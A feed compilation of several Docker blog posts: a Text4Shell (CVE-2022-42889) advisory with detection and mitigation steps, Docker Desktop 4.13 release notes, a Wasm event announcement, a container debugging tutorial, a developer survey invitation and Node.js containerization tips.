Security Advisory: CVE-2022-42889 “Text4Shell”

What is it?

CVE-2022-42889, aka “Text4Shell”, is a vulnerability in the popular Java library “Apache Commons Text” which can result in arbitrary code execution when processing malicious input. More information can be found at GitHub advisory or this Apache thread.

What can an attacker do?

If you’re vulnerable, an attacker can inject malicious input containing keywords which can trigger: 

a DNS requesta call to a remote URLan inline script to execute

These three mechanisms will be executed on the server and can trigger arbitrary code to execute, pulling code from external sources or embedding arbitrary scripts.

This makes this vulnerability highly serious, although, in many cases, consumers of this library won’t be vulnerable due to not using the StringSubstitutor class (as below) and/or not passing in untrusted input into vulnerable functions.

Security researchers are also reporting that increased and significant activity to exploit this vulnerability is being recorded.

Am I vulnerable?

To be vulnerable, you must:

Use Apache Commons Text version 1.5-1.9 inclusiveHave code using the StringSubstitutor class with variable interpolationHave a mechanism of accepting input and passing it into the StringSubstitutor class

Docker vulnerability scanning tools including the docker scan CLI and Docker Hub Vulnerability Scanning, powered by Snyk, will detect the presence of the vulnerable versions of the library and flag your image as vulnerable (see below).

Note that you may not be vulnerable even if you’re using these versions, as your code paths may already mitigate this by either not using the vulnerable methods, or by not passing in user input into them (see the Mitigations section below). This may be difficult to validate, however, without understanding all the code paths in detail and where they may get input from. So the easiest fix is simply to upgrade all applications depending on vulnerable versions.

You can use docker scan to check if the image has the vulnerability. If Text4Shell is present you will see a message in the output log like this:

  Upgrade org.apache.commons:commons-text@1.9 to org.apache.commons:commons-text@1.10.0 to fix
✗ Arbitrary Code Execution (new) [High Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHECOMMONS-3043138] in org.apache.commons:commons-text@1.9
introduced by org.apache.commons:commons-text@1.9

To test this, you can check a vulnerable image, for example this neo4j image contains a vulnerable version of commons-text at /var/lib/neo4j/lib/commons-text-1.9.jar:

docker scan neo4j:latest@sha256:17334cbc668d852ca8a3d8590f66c4fda64d9c7de7d93cc62803f534ae7dbce6

Docker Hub scans

As of 12:00 UTC 21 October 2022, Docker Hub now identifies the Text4Shell vulnerability and will badge any image it finds vulnerable. This badge will be publicly visible for Docker Official Images and Docker Verified Publisher images, and privately visible for any other images with vulnerability scanning enabled.

Scans before this date may not reflect this vulnerability, however, we will continue to scan older Docker Official and Docker Verified Publisher images and will update the badges as the results are checked.

If an image has been scanned and is found to be affected by the Text4Shell vulnerability, then you’ll see the below badging and information next to the image:

Mitigations

The safest mitigation to execute is to update to version 1.10 of Apache Commons Text.

If updating to this version isn’t possible, the secondary mitigation is to check usage closely across your codebase and ensure untrusted user input isn’t being passed to the vulnerable functions.

Docker Official Images

A number of the Docker Official images do contain the vulnerable versions of Apache Commons Text. These will be publicly labeled in the Docker Hub user interface. For more detailed information on the current status of Docker Official Images please see https://docs.docker.com/security/.

Other images

We’re working with the Docker Verified Publishers to identify and update their affected images. We’re also looking at ways to highlight images that are affected, and we’ll continue to update this post as we have more information.

Is Docker infrastructure affected?

Docker Desktop and Docker Hub are not affected by the Text4Shell vulnerability. Docker largely uses Go code to build our applications, not Java. Although we do use some Java applications, we have confirmed we aren’t vulnerable to CVE-2022-42889.
Quelle: https://blog.docker.com/feed/

Control Dev Environments Better with Hardened Desktop (and More!)

Are you looking for even simpler and faster ways to do what you need in Docker Desktop? Whether you’re an admin looking for new ways to secure the supply chain or a developer who wants to discover new Docker Extensions or streamline your use of Dev Environments, Docker Desktop 4.13 has the updates you’re looking for. Read on to see what’s part of this release! 

Enhanced security and management for Docker Business customers

With this release, we’re introducing a new Docker Desktop security model: Hardened Docker Desktop This model includes two new features for Docker Business customers — Settings Management and Enhanced Container Isolation.

Settings Management

With Settings Management, admins can configure Docker Desktop’s settings on client machines throughout their org. In the new admin-settings.json file, admins are able to configure important security settings like proxies and network ranges, and ensure that these values can’t be modified by users.

Enhanced Container Isolation

For an extra layer of security, admins can also enable Enhanced Container Isolation, which ensures that any configurations set with Settings Management cannot be modified by user containers. Enhanced Container Isolation ensures that all containers run unprivileged in the Docker Desktop Linux VM using the Linux user-namespace, as well as introducing a host of other security enhancements. These features are the first within Docker’s new Hardened Desktop security model for Docker Business customers, which provides more granular control over Docker Desktop’s Linux VM.

Docker Extensions Categories

The Docker Extension Marketplace continues to grow, with over 25 extensions added since we launched at DockerCon! With all of these new options, it might be hard to know which extension will benefit you the most in your day to day workflows. 

That’s why in Docker Desktop 4.13, you can now search the Extensions Marketplace by title, description, or author. But there’s more — we also now provide a list of categories for filtering as per our roadmap issue.

The below screenshot shows the new categories that allow you to find useful extensions more easily. There’s categories for Kubernetes, security, testing tools, and more!Are there any extensions you’d like to see in the Marketplace? Let us know here!

How can I categorize my extension?

If you plan to publish your extension to the Marketplace, you can specify to which categories your extension belongs to. Add the label com.docker.extension.categories to the extension’s Dockerfile, followed by a list of comma separated values with the category keys defined in the docs.

For instance:

LABEL com.docker.extension.categories=”kubernetes,security”

Note that extensions published to the Marketplace before the 22nd of September 2022 have been auto-categorized by Docker, so if you’re the author of any of these, you don’t have to do anything.

Streamlined Dev Environments Experience

We’ve also made a number of improvements to Dev Environments with Docker Desktop 4.13:

CLI Plugin

Use the new docker dev CLI plugin to get the full Dev Environments experience from the terminal in addition to the Dashboard.

Launch from a Git repo

Now you can quickly launch a new environment from a Git repo:

docker dev create https://github.com/dockersamples/compose-dev-env

Simplified project configuration

Now all you need to get started is a compose-dev.yaml file. If you have an existing project with a .docker/ folder — don’t worry! It’ll be migrated automatically the next time you launch.

Dev Environments is still in beta, and your feedback is more important than ever. You can submit feedback directly from the Dev Environments tab in Docker Desktop.

What other features would make your life easier?

Now that you’ve learned what’s new, let us know what you think! Is there a feature or extension that will make using Docker an even better experience for you? Check out our public roadmap to leave feedback and to see what else is coming.
Quelle: https://blog.docker.com/feed/

Docker and Wasm Working Together? Find Out How at Wasm Day NA

You may have seen some hype around WebAssembly, or Wasm, as it’s often called. It’s a relatively new technology that allows you to compile application code written in languages like Rust, C, C++, Javascript, and Golang to byte code, then run it inside a sandboxed environment.

So why all the hype? Well, those sandboxed environments can run in a large variety of locations — including your web browser using a Javascript virtual machine. Not only does this mean the sandbox benefits from billions of dollars of investment in security, speed, and cross compatibility, it also means you can run existing code in your browser with some minor changes. And before you ask, yes, it can run Doom.

But running Doom in the browser is just one use case. Companies like WasmEdge are using Tensorflow to push the boundaries of what can be run with Wasm. Fermyon is building tools for Wasm to be used in microservices, while Vercel, Fastly, Shopify, and Cloudflare use Wasm for running code at the edge. Figma is using Wasm to provide higher performance in the browser for their application, and their new parent company Adobe is bringing their desktop applications to the Web using Wasm.

If all those examples don’t excite you about what’s possible with Wasm, I’m not sure what will!

How do Docker and Wasm fit together?

So what is Docker doing with Wasm? We see Wasm and containers as complementary technologies. The problem you’re solving will make one or the other more applicable, but they’re compatible, and should work well together in your cloud native application.

It really comes down to the use case. For example, Wasm’s quick startup time is great for short lived operations, and its isolation is a good match when you need strict security guarantees enforceable at the code level. But as of now, it doesn’t have multithreading or garbage collection capabilities, so any use case with those requirements isn’t a good fit. It also requires that you rebuild your software from source to work.

Join Docker at Cloud Native Wasm Day

We’ll be at the Cloud Native Wasm Day NA in Detroit on October 24, as a Diamond sponsor, to talk about how we’re providing developers the tooling they need using development experiences they already know and love.

Justin Cormack, our CTO, will be presenting during the keynote. In his presentation, he’ll talk about how the container, Docker, and cloud native communities are embracing Wasm — and give some insights as to where we can go from here. If you’ve never seen him speak, I highly recommend it!

Michael Yuan (WasmEdge) and I will also be giving a talk to show how WASI and container workloads work together in Docker Desktop. You’ll find out when to use Wasm, the current tooling options for Wasm, and how to use Docker and Wasm together. We’ll even share download links to the Docker + Wasm preview so you can give it a try yourself!

If you’re attending the Cloud Native Wasm Day don’t miss our keynote and talk!
Quelle: https://blog.docker.com/feed/

How to Fix and Debug Docker Containers Like a Superhero

While containers help developers rapidly build and run cross-platform applications, creating error-free apps remains a constant challenge. And while it’s not always obvious how container errors occur, this mystery is even harder for newer developers to unravel. Figuring out how to debug Docker containers can seem daunting.

In this Community All-Hands session, Ákos Takács demonstrated how to solve many of these pesky problems and gain the superpower of fixing containers.

Each issue can impact your image builds and final applications. Some bugs may not trigger clear error messages. To further complicate things, source-code inspection isn’t always helpful. 

But, common container issues don’t have to be your kryptonite! We’ll share Ákos’ favorite tips and show you how to conquer these development challenges.

In this tutorial:

Finding and fixing common container mistakesUsing the CLI for extra container visibilityChange your CLI output formatting for visibility and readabilityRemember to leverage your logsTackle issues with ENTRYPOINTAccess and inspect container contentDive deeply into files and foldersSolve Docker Build errorsSolve Docker Compose errorsOptional: Make direct file edits within running containersInvestigate less and develop more

Finding and fixing common container mistakes

Everyone is prone to the occasional silly mistake. You code when you’re tired, suffer from the occasional keyboard slip, or sometimes fail to copy text correctly between steps. These missteps can carry forward from one command to the next. And because easy-to-miss things like spelling errors or character omissions can fly under the radar, you’re left doing plenty of digging to solve basic problems. Nobody wants that, so what tools are at your disposal? 

Using the CLI for extra container visibility

Say we have an image downloaded from Docker Hub — any image at all — and use some variation of the docker run command to run it. The resulting container will be running the default command. If you want to surface that command, entering docker container ls –all will grab a list of containers with their respective commands. 

Users often copy these commands and reuse them within other longer CLI commands. As you’d expect, it’s incredibly easy to highlight incorrectly, copy an incomplete phrase, and run a faulty command that uses it.

While spinning up a new container, you’ll hit a snag. The runtime in this instance will fail since Docker cannot find the executable. It’s not located in the PATH, which indicates a problem:

Running the docker container ls –all command also offers some hints. Note the httpd-foregroun container command paired with its created (but not running) container. Conversely, the v0 container that’s running successfully leverages a valid, complete command:

How do we investigate further? Use the docker run –rm -it –name MYCONTAINER [IMAGE] bash command to open an interactive terminal within your container. Take the container’s default command and attempt to run it again. A “command not found” error message will appear.

This is much more succinct and shows that you’ve likely entered the wrong command — in this case by forgetting a character. While Ákos’ example uses httpd, it’s applicable to almost any container image. 

Change your CLI output formatting for visibility and readability

Container commands are clipped once they exceed a certain length in the terminal output. That prevents you from inspecting the command in its entirety. 

Luckily, Ákos showed how the –format ‘{{ json . }}’ | jq -C flag can improve how your terminal displays outputs. Instead of cutting off portions of text, here’s how your docker container ls –all result will look:

You can read and compare any parameters in full. Nothing is hidden. If you don’t have jq installed, you could instead enter the following command to display outputs similarly minus syntax highlighting. This beats the default tabular layout for troubleshooting:

docker container ls –all –format ‘{{ json . }}’ | python3 -m json.tool –json-lines

Lastly, why not just expand the original table view while only displaying relevant information? Run the following command with the –no-trunc flag to expand those table rows and completely reveal each cell’s contents:

docker container ls –all –format ‘table {{ .Names }}/t{{ .Status }}/t{{ .Command }}’ –no-trunc

These examples highlight the importance of visibility and transparency in troubleshooting. When you can uncover and easily digest the information you need, making corrections is much easier.      

Remember to leverage your logs

By following best practices, any active application running within a Docker container will produce log outputs. While you might view logging as a problem-catching mechanism, many running containers don’t experience issues.

Ákos believes it’s important to understand how normal log entries look. As a result, identifying abnormal log entries becomes that much easier. The docker logs command enables this:

The process of tuning your logs differs between tools and languages. For example, Ákos drew from methods involving httpd — like trace for detailed trace-level messages or LogLevel for filtering error messages — but these practices are widely applicable. You’ll probably want to zero in on startup and runtime errors to diagnose most issues. 

Log handling is configurable. Here are some common commands to help you drill down into container issues (and reduce noise):

Grab your container’s last 100 logs:

docker logs –tail 100 [container ID]

Grab all logs for a specific container:

docker logs [container ID]

View all active processes within a running container, should its logs be inaccessible:

docker top [container ID]

Log inspection enables easier remediation. Alongside Ákos, we agree that you should confirm any container changes or fixes after making them. This means you’ve taken the right steps and can move ahead.

Want to view all your logs together within Docker Desktop? Download our Logs Explorer extension, which lets you browse through your logs using filters and advanced search capabilities. You can even view new logs as they populate.

Tackle issues with ENTRYPOINT

When running applications, you’ll need to run executable files within your container. The ENTRYPOINT portion of your Dockerfile sets the main command within a container and basically assigns it a task. These ENTRYPOINT instructions rely on executable files being in the container. 

In Ákos’ example, he tackles a scenario where improper permissions can prevent Docker from successfully mounting and running an entrypoint.sh executable. You can copy his approach by doing the following: 

Use the ls -l $PWD/examples/v6/entrypoint.sh command to view your file’s permissions, which may be inadequate.Confirm that permissions are incorrect. Run a chmod 774 command to let this file read, write, and execute for all users.Use docker run to spin up a container v7 from the original entrypoint, which may work briefly but soon stop running. Inspect the entrypoint.sh file to confirm our desired command exists. 

We can confirm this again by entering docker container inspect v7-exiting to view our container definition and parameters. While the Entrypoint is specified, its Cmd definition is null. That’s what’s causing the issue:

Why does this happen? Many don’t know that by setting –entrypoint, any image with a default command will empty that command automatically. You’ll need to redefine your command for your container to work properly. Here’s how that CLI command might look:

docker run -d -v $PWD/examples/v7/entrypoint.sh:/entrypoint.sh –entrypoint /entrypoint.sh –name v7-running httpd:2.4 httpd-foreground

This works for any container image but we’re just drawing from an earlier example. If you run this and list your containers again, v7 will be active. Confirm within your logs that everything looks good. 

Access and inspect container content

Carefully managing files and system resources is critical during local development. That’s doubly true while working with multiple images, containers, or resource constraints. There are scenarios where your containers bloat as their contents accumulate over time. 

Keeping your files tidy is one thing. However, you may also want to copy your files from your container and move them into a temporary folder — using the docker cp command with a specified directory. Using a variation of ls -la ./var/v8, borrowing from Ákos’ example, then produces a list containing every file. 

This is great for visibility and confirming your container’s contents. And we can diagnose any issues one step further with docker container diff v8 to view which files have been changed, appended, or even deleted. If you’re experiencing strange container behavior, digging into these files might be useful. 

Dive deeply into files and folders

Close inspection is where hexdump comes in handy. The hexdump function converts your file into hexadecimal code, which is much more readable than binary. Ákos used the following commands:

docker cp v8:/usr/local/apache2/bin/httpd ./var/v8-httpd`
`hexdump -C -n 100 ./var/v8-httpd

You can adjust this -n number to read additional or fewer initial bytes. If your file contains text, this content will stand out and reveal the file’s main purpose. But, say you want to access a folder. While changing your directory and running docker container inspect … is standard, this method doesn’t work for Docker Desktop users. Since Desktop runs things in a VM, the host cannot access the folders within. 

Ákos showcased CTO Justin Cormack’s own nsenter1 image on GitHub, which lets us tap into those containers running with Docker Desktop environments. Docker Captain Bret Fisher has since expanded upon nsenter1’s documentation while adding useful commands. With these pieces in place, run the following command:

docker run –rm –privileged –pid=host alpine:3.16.2 nsenter -t 1 -m -u -i -n -p — sh -c “ cd ”$(docker container inspect v8 –format ‘{{ .GraphDriver.Data.UpperDir }}’}” && find .”

This command’s output mirrors that from our earlier docker container diff command. You can also run a hexdump using that same image above, which gives you the same troubleshooting abilities regardless of your environment. You can also inspect your entrypoint.sh to make important changes.  

Solve Docker Build errors 

While Docker BuildKit is quick and resilient, you can encounter errors that prevent image build completion. To learn why, run the following command to view each sequential build stage:

docker build $PWD/[MY SOURCE] –tag “MY TAG” –progress plain

BuildKit will provide readable context for each step and display any errors that occur:

If you see a missing file or directory error like the one above, don’t worry! You can use the cat $PWD/[MY SOURCE]/[MY DOCKERFILE] command to view the contents of your Dockerfile. Not only can you see where you misstepped more clearly, but you can also add a new instruction before the failing command to list your folder’s contents. 

Maybe those contents need updating. Maybe your folder is empty! In that case, you need to update everything so docker build has something to leverage. 

Next, run the build command again with the –no-cache flag added. This flag tells Docker to cleanly build from scratch each time without relying on caching:

You can progressively build updated versions of your Dockerfile and test those changes, given the cascading nature of instructions. Writing new instructions after the last working instruction — or making changes earlier on in your file — can eliminate those pesky build issues. Mechanisms like unlink or cp are helpful. The first behaves like rm while accepting only one argument, while cp copies critical files and folders into your image from a source.  

Solve Docker Compose errors

We use Docker Compose to spin up multiple services simultaneously using the docker compose –project-directory $PWD/[MY SOURCE] up -d command. 

However, one or more of those containers might unexpectedly exit. By running docker compose –project-directory $PWD/[MY SOURCE] ps to list out our services, you can see which containers are running or exited.

To pinpoint the problem, you’d usually grab logs via the docker compose logs command. You won’t need to specify a project directory in most cases. However, your container produces no logs since it isn’t running. 

Next, run the cat $PWD/[MY SOURCE]/docker-compose.yml command to view your Docker Compose file’s contents. It’s likely that your services definitions need fixing, so digging line by line within the CLI is helpful. Enter the following command to make this output even clearer:

docker compose –project-directory $PWD/[MY SOURCE] config

Your container exits when the commands contained within are invalid — just like we saw earlier. You’ll be able to see if you’ve entered a command incorrectly or if that command is empty. From there, you can update your Compose file and re-run docker compose –project-directory $PWD/[MY SOURCE] up -d. You can now confirm that everything is working by listing your services again. Your terminal will also output logs! 

Optional: Make direct file edits within running containers

Finally, it’s possible (and tempting) to directly edit your files within your container. This is viable while testing new changes and inspecting your containers. However, it’s usually considered best practice to create a new image and container instead. 

If you want to make edits within running containers, an editor like VS Code allows this, while IntelliJ doesn’t by comparison. Install the Docker extension for VS Code. You can then browse through your containers in the left sidebar, expand your collection of resources, and directly access important files. For example, web developers can directly edit their index.html files to change how user content is structured. 

Investigate less and develop more

Overall, the process of fixing a container, on the surface, may seem daunting to newer Docker users. The methods we’ve highlighted above can dramatically reduce that troubleshooting complexity — saving you time and effort. You can spend less time investigating issues and more time creating the applications users love. And we think those skills are pretty heroic. 

For more information, you can view Ákos Takács’ full presentation on YouTube to carefully follow each step. Want to dive deeper? Check out these additional resources to become a Docker expert: 

Learn how to view logs for a container or serviceView our Docker Run reference documentationLearn about best practices for writing Dockerfiles
Quelle: https://blog.docker.com/feed/

State of Application Development Survey: Tell Us How You Develop!

Welcome to the first annual Docker State of Application Development survey! Please help us deepen our knowledge of the developer community with 20 minutes of your time. We want to know where developers are focused in 2023 so we can make sure our products continue to serve you effectively. Your participation helps us to build the best experiences for you!

Participation will also enter you into a raffle for a chance to win one of the following prizes*:

1 Laptop Computer (Apple M1 Pro 14” or HP Dev One)3 Legos kits — Choose from the Millennium Falcon™, App-Controlled Cat® D11 Bulldozer, or The Colosseum.2 Consoles — Choose from a Playstation 5, Xbox Series X, or Nintendo Switch OLED.2 $300 Amazon.com gift cardsDocker swag sets

We’ll choose the winners randomly from those who complete the survey with meaningful answers. The results of the prize draw will be announced via email on November 11, 2022.

We’ll release the data in a full report in January 2023 so you can see what we heard from all of you — and gain key insights into today’s application development experience.

We’ve already started getting responses from the 7+ million Docker users worldwide, and we want to make sure our results are as representative and inclusive as possible.

Click here to take the State of Application Development survey.

We greatly appreciate every contribution. Your voice counts!

*Docker State of Application Development Promotion Official Rules.
Quelle: https://blog.docker.com/feed/

9 Tips for Containerizing Your Node.js Application

Over the last five years, Node.js has maintained its position as a top platform among professional developers. It’s an open source, cross-platform JavaScript runtime environment designed to maximize throughput. Node.js uses an event-driven, non-blocking I/O model that makes it lightweight and efficient — perfect for data intensive, real-time, and distributed applications. 

With over 90,500 stars and 24,400 forks, Node’s developer community is highly active. With more devs creating Node.js apps than ever before, finding efficient ways to build and deploy and cross platform is key. Let’s discuss how containerization can help before jumping into the meat of our guide. 

Why is containerizing a Node application important?

Containerizing your Node application has numerous benefits. First, Docker’s friendly, CLI-based workflow lets any developer build, share, and run containerized Node applications. Second, developers can install their app from a single package and get it up and running in minutes. Third, Node developers can code and test locally while ensuring consistency from development to production.

We’ll show you how to quickly package your Node.js app into a container. We’ll also tackle key concerns that are easy to forget — like image vulnerabilities, image bloat, missing image tags, and poor build performance. Let’s explore a simple todo list app and discuss how our nine tips might apply.

Analyzing a simple todo list application

Let’s first consider a simple todo list application. This is a basic React application with a Node.js backend and a MongoDB database. The source code of the complete project is available within our GitHub samples repo.

Building the application

Luckily, we can build our sample application in just a few steps. First, you’ll want to clone the appropriate awesome-compose sample to use it with your project:

git clone https://github.com/dockersamples/awesome-compose/
cd awesome-compose/react-express-mongodb
docker compose -f docker-compose.yaml up -d

Second, enter the docker compose ps command to list out your services in the terminal. This confirms that everything is accounted for and working properly:

docker compose ps
NAME COMMAND SERVICE STATUS PORTS
backend "docker-entrypoint.s…" backend running 3000/tcp
frontend "docker-entrypoint.s…" frontend running 0.0.0.0:3000->3000/tcp
mongo "docker-entrypoint.s…" mongo running 27017/tcp

Third, open your browser and navigate to https://localhost:3000 to view your application in action. You’ll see your todo list UI and be able to directly interact with your application:

This is a great way to spin up a functional application in a short amount of time. However, remember that these samples are foundations you can build upon. They’re customizable to better suit your needs. And this can be important from a performance standpoint — since our above example isn’t fully optimized. Next, we’ll share some general optimization tips and more to help you build the best app possible. 

Our top nine tips for containerizing and optimizing Node applications

1) Use a specific base image tag instead of “version:latest”

When building Docker images, we always recommended specifying useful tags which codify version information, intended destination (prod or test, for instance), stability, or other useful information for deploying your application across environments.

Don’t rely on the latest tag that Docker automatically pulls, outside of local development. Using latest is unpredictable and may cause unexpected behavior. Each time you pull a latest image version, it could contain a new build or untested code that may break your application. 

Consider the following Dockerfile that uses the specific node:lts-buster Docker image as a base image instead of node:latest. This approach may be preferable since lts-buster is a stable image:

# Create image based on the official Node image from dockerhub
FROM node:lts-buster

# Create app directory
WORKDIR /usr/src/app

# Copy dependency definitions
COPY package.json ./package.json
COPY package-lock.json ./package-lock.json

# Install dependencies
#RUN npm set progress=false
# && npm config set depth 0
# && npm i install
RUN npm ci

# Get all the code needed to run the app
COPY . .

# Expose the port the app runs in
EXPOSE 3000

# Serve the app
CMD ["npm", "start"]

Overall, it’s often best to avoid using FROM node:latest in your Dockerfile.

2) Use a multi-stage build

With multi-stage builds, a Docker build can use one base image for compilation, packaging, and unit testing. A separate image holds the application’s runtime. This makes the final image more secure and shrinks its footprint (since it doesn’t contain development or debugging tools). Multi-stage Docker builds help ensure your builds are 100% reproducible and lean. You can create multiple stages within a Dockerfile to control how you build that image.

You can containerize your Node application using a multi-layer approach. Each layer may contain different app components like source code, resources, and even snapshot dependencies. What if we want to package our application into its own image like we mentioned earlier? Check out the following Dockerfile to see how it’s done:

FROM node:lts-buster-slim AS development

WORKDIR /usr/src/app

COPY package.json ./package.json
COPY package-lock.json ./package-lock.json
RUN npm ci

COPY . .

EXPOSE 3000

CMD [ "npm", "run", "dev" ]

FROM development as dev-envs
RUN <<EOF
apt-get update
apt-get install -y –no-install-recommends git
EOF

# install Docker tools (cli, buildx, compose)
COPY –from=gloursdocker/docker / /
CMD [ "npm", "run", "dev" ]

We first add an AS development label to the node:lts-buster-slim statement. This lets us refer to this build stage in other build stages. Next, we add a new development stage labeled dev-envs. We’ll use this stage to run our development.

Now, let’s rebuild our image and run our development. We’ll use the same docker build command as above — while adding the –target development flag to specifically run the development build stage:

docker build -t node-docker –target dev-envs .

3) Fix security vulnerabilities in your Node image

Today’s developers rely on third-party code and apps while building their services. External software can introduce unwanted vulnerabilities into your code if you’re not careful. Leveraging trusted images and continually monitoring your containers helps protect you.

Whenever you build a node:lts-buster-slim Docker image, Docker Desktop prompts you to run security scans of the image to detect any known vulnerabilities.

Let’s use the the Snyk Extension for Docker Desktop to inspect our Node.js application. To begin, install Docker Desktop 4.8.0+ on your Mac, Windows, or Linux machine. Next, check the box within Settings > Extensions to Enable Docker Extensions.

You can then browse the Extensions Marketplace by clicking the “Add Extensions” button in the left sidebar, then searching for Snyk.

Snyk’s extension lets you rapidly scan both local and remote Docker images to detect vulnerabilities.

Install the Snyk and enter the node:lts-buster-slim Node Docker Official Image into the “Select image name” field. You’ll have to log into Docker Hub to start scanning. Don’t worry if you don’t have an account — it’s free and takes just a minute to create.

When running a scan, you’ll see this result within Docker Desktop:

Snyk uncovered 70 vulnerabilities of varying severity during this scan. Once you’re aware of these, you can begin remediation to fortify your image.

That’s not all. In order to perform a vulnerability check, you can use  the docker scan command directly against your Dockerfile:

docker scan -f Dockerfile node:lts-buster-slim

4) Leverage HEALTHCHECK

The HEALTHCHECK instruction tells Docker how to test a container and confirm that it’s still working. For example, this can detect when a web server is stuck in an infinite loop and cannot handle new connections — even though the server process is still running.

When an application reaches production, an orchestrator like Kubernetes or a service fabric will most likely manage it. By using HEALTHCHECK, you’re sharing the status of your containers with the orchestrator to enable configuration-based management tasks. Here’s an example:

# syntax=docker/dockerfile:1.4

FROM node:lts-buster-slim AS development

# Create app directory
WORKDIR /usr/src/app

COPY package.json ./package.json
COPY package-lock.json ./package-lock.json
RUN npm ci

COPY . .

EXPOSE 3000

CMD [ "npm", "run", "dev" ]

FROM development as dev-envs
RUN <<EOF
apt-get update
apt-get install -y –no-install-recommends git
EOF

RUN <<EOF
useradd -s /bin/bash -m vscode
groupadd docker
usermod -aG docker vscode
EOF

HEALTHCHECK CMD curl –fail http://localhost:3000 || exit 1

# install Docker tools (cli, buildx, compose)
COPY –from=gloursdocker/docker / /
CMD [ "npm", "run", "dev" ]

When HEALTHCHECK is present in a Dockerfile, you’ll see the container’s health in the STATUS column after running the docker ps command. A container that passes this check is healthy. The CLI will label unhealthy containers as unhealthy:

docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
1d0c5e3e7d6a react-express-mongodb-frontend "docker-entrypoint.s…" 23 seconds ago Up 21 seconds (health: starting) 0.0.0.0:3000->3000/tcp frontend
a89721d3c42d react-express-mongodb-backend "docker-entrypoint.s…" 23 seconds ago Up 21 seconds (health: starting) 3000/tcp backend
194c953f5653 mongo:4.2.0 "docker-entrypoint.s…" 3 minutes ago Up 3 minutes 27017/tcp mongo

You can also define a healthcheck (note the case difference) within Docker Compose! This can be pretty useful when you’re not using a Dockerfile. Instead of writing a plain text instruction, you’ll write this configuration in YAML format. 

Here’s a sample configuration that lets you define healthcheck within your docker-compose.yml file:

backend:
container_name: backend
restart: always
build: backend
volumes:
– ./backend:/usr/src/app
– /usr/src/app/node_modules
depends_on:
– mongo
networks:
– express-mongo
– react-express
expose:
– 3000
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost:3000"]
interval: 1m30s
timeout: 10s
retries: 3
start_period: 40s

5) Use .dockerignore

To increase build performance, we recommend creating a .dockerignore file in the same directory as your Dockerfile. For this tutorial, your .dockerignore file should contain just one line:

node_modules

This line excludes the node_modules directory — which contains output from Maven — from the Docker build context. There are many good reasons to carefully structure a .dockerignore file, but this simple file is good enough for now.

Let’s now explain the build context and why it’s essential . The docker build command builds Docker images from a Dockerfile and a “context.” This context is the set of files located in your specified PATH or URL. The build process can reference any of these files. 

Meanwhile, the compilation context is where the developer works. It could be a folder on Mac, Windows, or a Linux directory. This directory contains all necessary application components like source code, configuration files, libraries, and plugins. With a .dockerignore file, we can determine which of the following elements like source code, configuration files, libraries, plugins, etc. to exclude while building your new image. 

Here’s how your .dockerignore file might look if you choose to exclude the node_modules directory from your build:

Backend:

Frontend:

6) Run as a non-root user for security purpose

Running applications with user privileges is safer since it helps mitigate risks. The same applies to Docker containers. By default, Docker containers and their running apps have root privileges. It’s therefore best to run Docker containers as non-root users. 

You can do this by adding USER instructions within your Dockerfile. The USER instruction sets the preferred user name (or UID) and optionally the user group (or GID) while running the image — and for any subsequent RUN, CMD, or ENTRYPOINT instructions:

FROM node:lts-buster AS development

WORKDIR /usr/src/app

COPY package.json ./package.json
COPY package-lock.json ./package-lock.json

RUN npm ci

COPY . .

EXPOSE 3000

CMD ["npm", "start"]

FROM development as dev-envs
RUN <<EOF
apt-get update
apt-get install -y –no-install-recommends git
EOF

RUN <<EOF
useradd -s /bin/bash -m vscode
groupadd docker
usermod -aG docker vscode
EOF
# install Docker tools (cli, buildx, compose)
COPY –from=gloursdocker/docker / /
CMD [ "npm", "start" ]

7) Favor multi-architecture Docker images

Your CPU can only run binaries for its native architecture. For example, Docker images built for an x86 system can’t run on an Arm-based system. With Apple fully transitioning to their custom Arm-based silicon, it’s possible that your x86 (Intel or AMD) container image won’t work with Apple’s M-series chips. 

Consequently, we always recommended building multi-arch container images. Below is the mplatform/mquery Docker image that lets you query the multi-platform status of any public image in any public registry:

docker run –rm mplatform/mquery node:lts-buster
Unable to find image ‘mplatform/mquery:latest’ locally
d0989420b6f0: Download complete
af74e063fc6e: Download complete
3441ed415baf: Download complete
a0c6ee298a93: Download complete
894bcacb16df: Downloading [=============================================> ] 3.146MB/3.452MB
Image: node:lts-buster (digest: sha256:a5d9200d3b8c17f0f3d7717034a9c215015b7aae70cb2a9d5e5dae7ff8aa6ca8)
* Manifest List: Yes (Image type: application/vnd.docker.distribution.manifest.list.v2+json)
* Supported platforms:
– linux/amd64
– linux/arm/v7
– linux/arm64/v8

We introduced the docker buildx command to help you build multi-architecture images. Buildx is a Docker component that enables many powerful build features with a familiar Docker user experience. All Buildx builds run using the Moby BuildKit engine.

BuildKit is designed to excel at multi-platform builds, or those not just targeting the user’s local platform. When you invoke a build, you can set the –platform flag to specify the build output’s target platform (like linux/amd64, linux/arm/v7, linux/arm64/v8, etc.):

docker buildx build –platform linux/amd64,linux/arm/v7 -t node-docker .

8) Explore graceful shutdown options for Node

Docker containers are ephemeral in nature. They can be stopped and destroyed, then either rebuilt or replaced with minimal effort. You can terminate containers by sending a SIGTERM notice signal to the process. This little grace period requires you to ensure that your app is handling ongoing requests and cleaning up resources in a timely fashion. 

On the other hand, Node.js accepts and forwards signals like SIGINT and SIGTERM from the OS, which is key to properly shutting down your app. Node.js lets your app decide how to handle those signals. If you don’t write code or use a module to handle them, your app won’t shut down gracefully. It’ll ignore those signals until Docker or Kubernetes kills it after a timeout period. 

Using certain init options like docker run –init or tini within your Dockerfile is viable when you can’t change your app code. However, we recommend writing code to handle proper signal handling for graceful shutdowns.

Check out this video from Docker Captain Bret Fisher (12:57) where he covers all three available Node shutdown options in detail.

9) Use the OpenTelemetry API to measure NodeJS performance

How do Node developers make their apps faster and more performant? Generally, developers rely on third-party observability tools to measure application performance. This performance monitoring is essential for creating multi-functional Node applications with top notch user experiences.

Observability extends beyond application performance. Metrics, traces, and logs are now front and center. Metrics help developers to understand what’s wrong with the system, while traces help you discover how it’s wrong. Logs tell you why it’s wrong. Developers can dig into particular metrics and traces to holistically understand system behavior.

Observing Node applications means tracking your Node metrics, requests rates, request error rate, and request durations. OpenTelemetry is one popular collection of tools and APIs that help you instrument your Node.js application.

You can also use an open-source tool like SigNoz to analyze your app’s performance. Since SigNoz offers a full-stack observability tool, you don’t need to rely on multiple tools.

Conclusion

